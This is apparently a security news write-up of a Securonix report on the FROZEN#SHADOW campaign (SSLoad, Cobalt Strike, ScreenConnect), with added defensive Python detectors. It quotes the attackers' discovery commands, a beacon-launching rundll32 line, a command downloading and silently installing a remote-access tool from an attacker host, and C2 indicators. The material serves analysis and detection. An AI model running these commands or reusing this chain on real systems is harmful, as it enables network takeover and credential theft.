Friday, November 1, 2024

New SSLoad Malware Combined With Tools Hijacking Entire Network Domain


A new attack campaign, tracked as FROZEN#SHADOW, has been discovered that uses SSLoad malware for its operations and Cobalt Strike implants to pivot and take over the entire network.

In addition, the threat actors also used Remote Monitoring and Management (RMM) software, such as ScreenConnect, for further control.

SSLoad is a well-designed malware that can stealthily infiltrate systems, gather sensitive information, and exfiltrate the collected information back to the malware operators.


Moreover, the malware also leverages multiple backdoors and payloads to evade detection and maintain persistence.

Technical Analysis

This new attack campaign starts with a traditional phishing email containing a malicious link.

When a user visits this link, they are redirected through the mmtixmm[.]org URL to another download site, from which a JavaScript file is downloaded to the victim machine.


If this JavaScript file is manually executed, it performs several operations that will download and execute further payloads on the victim machine.

The targeting of these phishing email campaigns appears to be random, as the victims were located in multiple countries across Asia, Europe, and the Americas.

Further investigations on the malware revealed that the attack takes place in different stages as follows:

  • Stage 1: Initial Execution – JavaScript
  • Stage 2: MSI File Execution
  • Stage 3: Malware Execution
  • Stage 4: Cobalt Strike Execution
  • Stage 5: RMM Software & Lateral Movement

Stage 1: Initial Execution – JavaScript

This initial stage involves the manual execution of the JavaScript file.

On analyzing the JS file out_czlrh.js, it was discovered that 97.6% of the file consisted of commented-out code made of random characters, used to obfuscate the file.

Removing the commented code, however, revealed clear JS code with no further obfuscation.

JS file padded with blocks of commented-out code (Source: Securonix)

On analyzing the JS code, it was observed that the file performs multiple operations, which start with creating ActiveXObject instances for WScript.Network and Scripting.FileSystemObject.

After this, the JS code calls GetObject("winmgmts:\\\\.\\root\\cimv2") to access the WMI object for simple command-line operations.

Clean code after removing the comments from the JS file (Source: Securonix)

In addition, the code also sets up variables to manage the number of connection attempts and gather the connection status of a network share.

Further, the script also maps all the available drives to a network share located at \\wireoneinternet[.]info@80\share\.

The JS code then executes the "net use" command via WMI to map the network drive.

After a three-second wait, it runs the same command again to confirm that the network drive was mapped.

Once all these steps are successfully completed, the script constructs a command to install an MSI package (slack.msi) from the mapped network drive using msiexec.exe.
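A defender triaging a script like out_czlrh.js wants two things quickly: how much of the file is comment padding, and what the remaining code actually calls. The following Python is an added example, not code from the article or from Securonix. The script it analyses is constructed here to mimic the layout described above (a few lines of clear JScript buried in comment lines of random characters); the share host and MSI name in it are placeholders, not the campaign's values, and the 90% and three-indicator thresholds are tuning choices.

```python
import re

# Constructed sample: a few lines of readable JScript padded with comment
# lines of random characters, mimicking the layout described above. The share
# host and MSI name are placeholders, not values from the campaign.
_JUNK_LINE = "// " + "k3Qx9zP1mVb7Rt" * 20 + "\n"
_CLEAR_CODE = r'''var net = new ActiveXObject("WScript.Network");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var wmi = GetObject("winmgmts:\\\\.\\root\\cimv2");
var share = "\\\\placeholder-host.invalid@80\\share\\";
var mapCmd = "net use * " + share;
var installCmd = "msiexec.exe /i " + share + "package.msi /quiet";
'''
SAMPLE_JS = _JUNK_LINE * 40 + _CLEAR_CODE + _JUNK_LINE * 40

# Behavioural strings worth flagging in a dropper; each value is a regex.
INDICATORS = {
    "ActiveXObject": r"\bActiveXObject\b",
    "WScript.Network": r"WScript\.Network",
    "Scripting.FileSystemObject": r"Scripting\.FileSystemObject",
    "winmgmts": r"winmgmts:",
    "net use": r"\bnet\s+use\b",
    "msiexec": r"\bmsiexec(?:\.exe)?\b",
    "port-80 UNC share": r'\\\\[^\\\s"\']+@80\\',
}


def strip_js_comments(src: str) -> str:
    """Remove // and /* */ comments while leaving string literals untouched,
    so a URL containing // inside quotes is not mistaken for a comment.
    Regex literals are not handled; that is enough for a padded dropper."""
    out = []
    i, n = 0, len(src)
    while i < n:
        ch = src[i]
        if ch in ('"', "'"):
            j = i + 1
            while j < n and src[j] != ch:
                j += 2 if src[j] == "\\" else 1   # skip escaped characters
            out.append(src[i:j + 1])
            i = j + 1
        elif src.startswith("//", i):
            j = src.find("\n", i)
            i = n if j == -1 else j               # keep the newline itself
        elif src.startswith("/*", i):
            j = src.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def comment_ratio(src: str) -> float:
    """Fraction of the file that is comment text (0.0 to 1.0)."""
    if not src:
        return 0.0
    return 1.0 - len(strip_js_comments(src)) / len(src)


def find_indicators(code: str) -> list:
    """Names of the INDICATORS present in (de-commented) code."""
    return [name for name, rx in INDICATORS.items() if re.search(rx, code, re.I)]


def triage(src: str) -> dict:
    """Summarise a script: padding ratio, behavioural indicators found in the
    de-commented code and a simple verdict (thresholds are a tuning choice)."""
    clean = strip_js_comments(src)
    ratio = comment_ratio(src)
    hits = find_indicators(clean)
    return {
        "comment_ratio": round(ratio, 3),
        "indicators": hits,
        "suspicious": ratio >= 0.9 or len(hits) >= 3,
    }


if __name__ == "__main__":
    print(triage(SAMPLE_JS))
```

The comment stripper walks the file character by character rather than using a regex so that `//` inside a quoted URL is preserved; running the indicator search on the stripped text rather than the raw file avoids false hits on strings hidden inside the padding.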

Stage 2: MSI Execution

This slack.msi file is similar to the BazarBackdoor, often used by the TrickBot malware gang.

The malware is capable of infiltrating networks and deploying additional payloads. After the slack.msi file executes, the malware communicates with multiple domains:

  • wireoneinternet[.]info
  • skinnyjeanso[.]com
  • titnovacrion[.]top
  • Maramaravilha[.]com
  • globalsolutionunlimitedltd[.]com

Only after this is the SSLoad malware itself downloaded and executed.

The SSLoad payload consists of a semi-randomly named DLL file located at \%APPDATA%\local\digistamp\mbae-api-na.dll.

This DLL is executed by rundll32.exe, after which it copies itself to %APPDATA%\Custom_update\.

SSLoad DLL file details (Source: Securonix)

Stage 3: Malware Execution

In addition to the previous stage, the execution of the rundll32.exe command also begins communication with two preconfigured C2 servers, hxxps://skinnyjeanso[.]com/live/ and hxxps://titnovacrion[.]top/live/. The malware then collects system and user data for the local host, as well as domain-related information, using the following cmd.exe commands:

  • cmd.exe /c ipconfig /all
  • cmd.exe /c systeminfo
  • cmd.exe /c nltest /domain_trusts
  • cmd.exe /c nltest /domain_trusts /all_trusts
  • cmd.exe /c net view /all /domain
  • cmd.exe /c net view /all
  • cmd.exe /c net group "domain admins" /domain
  • cmd.exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list
  • cmd.exe /c net config workstation
  • cmd.exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get displayname | findstr /v /b /c:displayname || echo no antivirus installed
  • cmd.exe /c whoami /groups

The collected information is then sent to the C2 servers over HTTPS. Once the threat actors receive it, they confirm that it comes from a legitimate system rather than a honeypot, and then begin executing manual commands. The manual commands executed by the threat actors are as follows:

  • powershell.exe -c "[console]::outputencoding = [console]::inputencoding = [system.text.encoding]::getencoding('utf-8'); cd c:\; powershell"
  • whoami.exe /groups
  • net.exe group "domain admins" /dom
  • wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list

These commands were executed to manipulate and probe the server environment in preparation for the next stage of malware activity.
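Each of the discovery commands above is benign on its own; what stands out is that seven or eight of them run from the same parent process within seconds. The following Python is an added example, not code from the article or from Securonix, that correlates them over process-creation log lines. The key=value log format, host names, parent PIDs and timestamps are constructed for the example, and the 120-second window and four-category threshold are tuning choices rather than values from the report.

```python
import re
from datetime import datetime, timedelta

# Each discovery category listed above, as a case-insensitive regex.
DISCOVERY_PATTERNS = {
    "ipconfig": re.compile(r"\bipconfig\b.*/all", re.I),
    "systeminfo": re.compile(r"\bsysteminfo\b", re.I),
    "domain_trusts": re.compile(r"\bnltest\b.*/domain_trusts", re.I),
    "net_view": re.compile(r"\bnet(?:\.exe)?\s+view\b", re.I),
    "domain_admins": re.compile(r'\bnet(?:\.exe)?\s+group\s+"?domain admins"?', re.I),
    "av_enum": re.compile(r"securitycenter2.*antivirusproduct", re.I),
    "net_config": re.compile(r"\bnet(?:\.exe)?\s+config\s+workstation\b", re.I),
    "whoami_groups": re.compile(r"\bwhoami(?:\.exe)?\b.*/groups", re.I),
}

# Constructed process-creation log in a simple key=value format (assumed for
# this example; real Sysmon or EDR fields differ). WS01 reproduces the burst
# listed above, WS02 runs two discovery commands eleven minutes apart and
# WS03 is ordinary user activity.
SAMPLE_LOG = r'''
2024-04-22T10:15:01Z host=WS01 ppid=2208 cmd="cmd.exe /c ipconfig /all"
2024-04-22T10:15:04Z host=WS01 ppid=2208 cmd="cmd.exe /c systeminfo"
2024-04-22T10:15:09Z host=WS01 ppid=2208 cmd="cmd.exe /c nltest /domain_trusts /all_trusts"
2024-04-22T10:15:15Z host=WS01 ppid=2208 cmd="cmd.exe /c net view /all /domain"
2024-04-22T10:15:22Z host=WS01 ppid=2208 cmd="cmd.exe /c net group "domain admins" /domain"
2024-04-22T10:15:30Z host=WS01 ppid=2208 cmd="cmd.exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list"
2024-04-22T10:15:41Z host=WS01 ppid=2208 cmd="cmd.exe /c whoami /groups"
2024-04-22T10:20:00Z host=WS02 ppid=912 cmd="cmd.exe /c ipconfig /all"
2024-04-22T10:31:00Z host=WS02 ppid=912 cmd="cmd.exe /c systeminfo"
2024-04-22T11:02:13Z host=WS03 ppid=5540 cmd="notepad.exe C:\Users\admin\notes.txt"
'''

LINE_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) ppid=(?P<ppid>\d+) cmd="(?P<cmd>.*)"$')


def parse_line(line: str):
    """Parse one constructed log line; returns None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "host": m["host"],
        "ppid": int(m["ppid"]),
        "cmd": m["cmd"],
    }


def classify(cmd: str) -> list:
    """Names of the discovery categories a command line falls into."""
    return [name for name, rx in DISCOVERY_PATTERNS.items() if rx.search(cmd)]


def detect_discovery_bursts(lines, window=timedelta(seconds=120), threshold=4) -> list:
    """Alert once per (host, parent pid) when at least `threshold` distinct
    discovery categories run within `window` of each other."""
    hits = {}
    for event in filter(None, map(parse_line, lines)):
        cats = classify(event["cmd"])
        if cats:
            hits.setdefault((event["host"], event["ppid"]), []).append((event["ts"], cats))
    alerts = []
    for (host, ppid), seq in hits.items():
        seq.sort(key=lambda item: item[0])
        for i, (start, _) in enumerate(seq):
            seen = set()
            for ts, cats in seq[i:]:        # sliding window starting at each event
                if ts - start > window:
                    break
                seen.update(cats)
            if len(seen) >= threshold:
                alerts.append({"host": host, "ppid": ppid, "start": start,
                               "categories": sorted(seen)})
                break                        # one alert per parent process
    return alerts


if __name__ == "__main__":
    for alert in detect_discovery_bursts(SAMPLE_LOG.splitlines()):
        print(alert)
```

Counting distinct categories rather than raw command count keeps an administrator who runs `net view` five times from tripping the rule, while the per-parent grouping mirrors the fact that here every command was spawned by the same rundll32-hosted DLL.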

Stage 4: Cobalt Strike Beacon

This stage involves deploying the Cobalt Strike beacon on the system after the manual commands have been executed.

Once deployed, this beacon becomes the primary C2 channel. It is dropped and executed via the following rundll32.exe command:

Rundll32.exe C:\ProgramData\msedge.dll,MONSSMRpgaTQssmrpgatq

Additionally, the threat actors used the Cobalt Strike beacon to download and install a ScreenConnect RMM software instance on the victim system using the following commands:

  • cmd.exe /c whoami /groups
  • cmd.exe /c wmic /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list
  • cmd.exe /c iwr -uri "hxxps://t0talwar.screenconnect[.]com/bin/screenconnect.clientsetup.msi?e=access&y=guest&c=&c=tjx-usa.com&c=&c=dc&c=&c=&c=&c=" -outfile c:\programdata\msedgeview.msi
  • cmd.exe /c systeminfo
  • cmd.exe /c msiexec.exe /i C:\ProgramData\Msedgeview.msi /quiet /qn
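The execution chain in Stages 2 and 4 shares one pattern: rundll32.exe loading a DLL from a user-writable directory (%APPDATA% for SSLoad, C:\ProgramData for the beacon), a download written under C:\ProgramData, and a silent msiexec install of that same file. The following Python is an added example, not code from the article or from Securonix, that checks command lines for those three conditions and links a download to a later silent install of the same path on the same host. The event tuples are constructed: the msedge.dll rundll32 line is the one quoted above, while the download URL, host names, user name and the export name on the digistamp DLL are placeholders.

```python
import re

# Locations an unprivileged user can write to. A DLL loaded by rundll32.exe or
# an MSI installed silently from one of these deserves a closer look.
USER_WRITABLE = re.compile(
    r"\\ProgramData\\|\\AppData\\|%APPDATA%|%PROGRAMDATA%|\\Users\\[^\\]+\\", re.I)
RUNDLL32_RE = re.compile(
    r'\brundll32(?:\.exe)?\s+"?(?P<dll>[^,"]+?\.dll)"?\s*,\s*(?P<export>\S+)', re.I)
DOWNLOAD_RE = re.compile(
    r'\b(?:iwr|invoke-webrequest|curl|wget)\b.*?-outfile\s+"?(?P<out>[^"\s]+)', re.I)
MSIEXEC_RE = re.compile(r'\bmsiexec(?:\.exe)?\b.*?/i\s+"?(?P<msi>[^"\s]+)', re.I)
SILENT_RE = re.compile(r"\s/q(?:uiet|n|b)?(?=\s|$)", re.I)

# Constructed (host, command line) events in time order. The msedge.dll line
# is the one quoted in the article; the download URL, host names, user name
# and the export name on the digistamp DLL are placeholders.
SAMPLE_EVENTS = [
    ("WS01", r"Rundll32.exe C:\ProgramData\msedge.dll,MONSSMRpgaTQssmrpgatq"),
    ("WS01", r'cmd.exe /c iwr -uri "https://placeholder-rmm.invalid/bin/client.msi?e=access" -outfile c:\programdata\msedgeview.msi'),
    ("WS01", r"cmd.exe /c msiexec.exe /i C:\ProgramData\Msedgeview.msi /quiet /qn"),
    ("WS02", r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    ("WS02", r"msiexec.exe /i C:\ProgramData\vendor-agent.msi /qn"),
    ("WS03", r"rundll32.exe C:\Users\alice\AppData\Local\digistamp\mbae-api-na.dll,PlaceholderExport"),
]


def analyse_command(cmd: str) -> list:
    """Return (rule_name, path) pairs produced by the single-event rules."""
    findings = []
    m = RUNDLL32_RE.search(cmd)
    if m and USER_WRITABLE.search(m["dll"]):
        findings.append(("rundll32_user_writable_dll", m["dll"]))
    m = DOWNLOAD_RE.search(cmd)
    if m and USER_WRITABLE.search(m["out"]):
        findings.append(("download_to_user_writable", m["out"]))
    m = MSIEXEC_RE.search(cmd)
    if m and USER_WRITABLE.search(m["msi"]) and SILENT_RE.search(cmd):
        findings.append(("silent_msi_from_user_writable", m["msi"]))
    return findings


def analyse_host_sequence(events) -> list:
    """Run the single-event rules over (host, cmd) events in time order and add a
    chain finding when a file downloaded into a user-writable directory is later
    installed silently on the same host. Paths are compared case-insensitively,
    since Windows treats c:\programdata and C:\ProgramData as the same place."""
    downloaded = set()
    results = []
    for host, cmd in events:
        for name, path in analyse_command(cmd):
            results.append((host, name, path))
            key = (host, path.lower())
            if name == "download_to_user_writable":
                downloaded.add(key)
            elif name == "silent_msi_from_user_writable" and key in downloaded:
                results.append((host, "download_then_silent_install", path))
    return results


if __name__ == "__main__":
    for finding in analyse_host_sequence(SAMPLE_EVENTS):
        print(finding)
```

The WS02 shell32.dll line shows why the path check matters: rundll32 with a Control Panel applet from System32 is everyday Windows behaviour, and flagging every rundll32 export call would bury the one that loads from ProgramData.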

Stage 5: RMM Software And Lateral Movement

Every compromised system is enrolled in the ScreenConnect RMM software so as to maintain complete control over it.

After this, lateral movement takes place, supported by harvesting credentials and other critical system details.

The environment is enumerated using multiple PowerShell commands, including Invoke-ShareFinder, Find-DomainShare, and Get-DomainFileServer.

Credential extraction follows, through which the attackers also obtained the NTLM hash of a domain admin account.

Indicators Of Compromise

C2 Address

  • 85.239.54[.]190
  • 23.159.160[.]88
  • 23.95.209[.]148
  • 45.95.11[.]134
  • bjSdg0.pintaexoticfashion.co[.]in
  • l1-03.winupdate.us[.]to
  • 23-95-209-148-host.colocrossing[.]com:443
  • mmtixmm[.]org
  • wireoneinternet[.]info
  • skinnyjeanso[.]com
  • titnovacrion[.]top
  • simplyfitphilly[.]com
  • kasnackamarch[.]info
  • sokingscrosshotel[.]com
  • danteshpk[.]com
  • stratimasesstr[.]com
  • winarkamaps[.]com
  • globalsolutionunlimitedltd[.]com
  • maramaravilha[.]com
  • krd6[.]com
  • hxxps://t0talwar.screenconnect[.]com
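To put the indicators above to use, a defender has to refang them (restore the dots and the http scheme), strip ports and URL paths, and then match DNS or proxy logs against both the domain list and the IP list, including queries for subdomains of a listed domain. The following Python is an added example, not code from the article or from Securonix, that does this against a few constructed resolver log lines; the log format, client addresses and answer addresses are assumed for the example (203.0.113.0/24 is a documentation range), while the indicator list is the one printed above.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# The indicators listed above, in their defanged form.
RAW_IOCS = [
    "85.239.54[.]190", "23.159.160[.]88", "23.95.209[.]148", "45.95.11[.]134",
    "bjSdg0.pintaexoticfashion.co[.]in", "l1-03.winupdate.us[.]to",
    "23-95-209-148-host.colocrossing[.]com:443", "mmtixmm[.]org",
    "wireoneinternet[.]info", "skinnyjeanso[.]com", "titnovacrion[.]top",
    "simplyfitphilly[.]com", "kasnackamarch[.]info", "sokingscrosshotel[.]com",
    "danteshpk[.]com", "stratimasesstr[.]com", "winarkamaps[.]com",
    "globalsolutionunlimitedltd[.]com", "maramaravilha[.]com", "krd6[.]com",
    "hxxps://t0talwar.screenconnect[.]com",
]

# Constructed resolver log lines: format, clients and answer addresses are
# assumed for this example; 203.0.113.0/24 is a documentation range.
SAMPLE_DNS_LOG = """\
2024-04-22T10:16:02Z client=10.0.0.15 query=titnovacrion.top type=A answer=203.0.113.7
2024-04-22T10:16:05Z client=10.0.0.15 query=www.example.com type=A answer=203.0.113.10
2024-04-22T10:17:40Z client=10.0.0.22 query=cdn-edge.example.net type=A answer=45.95.11.134
2024-04-22T10:18:01Z client=10.0.0.31 query=L1-03.WINUPDATE.US.TO. type=A answer=203.0.113.9
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) client=(?P<client>\S+) query=(?P<q>\S+) type=\S+ answer=(?P<ans>\S+)$")


def refang(value: str) -> str:
    """Undo the usual defanging: [.] or (.) for dots, hxxp for http."""
    value = value.strip().replace("[.]", ".").replace("(.)", ".")
    return re.sub(r"^hxxp", "http", value, flags=re.I)


def normalise_ioc(raw: str):
    """Return ("ip", addr) or ("domain", name), dropping scheme, path and port."""
    s = refang(raw)
    if "://" in s:
        s = urlsplit(s).hostname or s
    s = re.sub(r":\d+$", "", s)          # explicit port such as :443
    s = s.lower().rstrip(".")
    try:
        return "ip", str(ipaddress.ip_address(s))
    except ValueError:
        return "domain", s


def build_index(raw_iocs):
    """Split the indicator list into a set of IPs and a set of domain names."""
    ips, domains = set(), set()
    for raw in raw_iocs:
        kind, value = normalise_ioc(raw)
        (ips if kind == "ip" else domains).add(value)
    return ips, domains


def match_hostname(qname: str, domains) -> str:
    """Exact or parent-domain match: a query for a.b.ioc.tld hits ioc.tld.
    The bare TLD is never tested, so 'com' alone cannot match anything."""
    labels = qname.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in domains:
            return candidate
    return None


def scan_dns_log(lines, raw_iocs=RAW_IOCS) -> list:
    """Return one hit per log line whose query name or answer address matches."""
    ips, domains = build_index(raw_iocs)
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        hit, kind = match_hostname(m["q"], domains), "domain"
        if hit is None and m["ans"] in ips:
            hit, kind = m["ans"], "ip"
        if hit:
            hits.append({"ts": m["ts"], "client": m["client"],
                         "query": m["q"], "ioc": hit, "kind": kind})
    return hits


if __name__ == "__main__":
    for hit in scan_dns_log(SAMPLE_DNS_LOG.splitlines()):
        print(hit)
```

Checking the answer address as well as the query name is what catches the third line: the name is not on the list, but it resolves to a listed C2 address, which is exactly the case a domain-only blocklist misses.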

Furthermore, a complete list of the files and hashes used in this attack campaign can be found in the original Securonix report.


Eswar